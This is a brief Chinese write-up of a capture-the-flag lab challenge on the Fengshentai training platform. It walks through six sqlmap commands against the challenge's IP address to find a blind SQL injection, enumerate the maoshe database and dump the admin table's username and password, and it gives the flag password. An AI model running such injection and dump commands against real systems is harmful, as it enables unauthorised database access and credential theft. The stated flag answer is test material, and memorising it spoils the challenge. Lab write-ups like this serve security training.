封神台——第一题：为了女神小芳

题目：获取数据库管理员密码

题目传送阵

渗透步骤

       第一步：点击“点击查看新闻”超链接，跳转到一个页面，url发生改变，设想这个页面存在sql漏洞。

       第二步：输入sqlmap.py -u "http://59.63.200.79:8003/?id=1" --batch，使用sqlmap对该页面进行扫描，看该页面是否存在漏洞，从结果得知可以从基于布尔以及时间的盲注进行攻击。

       第三步：输入sqlmap.py -u "http://59.63.200.79:8003/?id=1" --batch --dbs 查看数据库，发现maoshe数据库，结合页面，猜测需要获取的密码存在于这个数据库里面.

       第四步：输入sqlmap.py -u "http://59.63.200.79:8003/?id=1" --batch -D maoshe --tables查看maoshe数据库里面的表，发现admin这个表。

       第五步：输入sqlmap.py -u "http://59.63.200.79:8003/?id=1" --batch -D maoshe -T admin --columns查看admin里面的内容，发现用户名以及密码。

       第六步：输入sqlmap.py -u "http://59.63.200.79:8003/?id=1" --batch -D maoshe -T admin -C "username,password" --dump查看用户名以及密码，之后提交密码“hellohack”即可。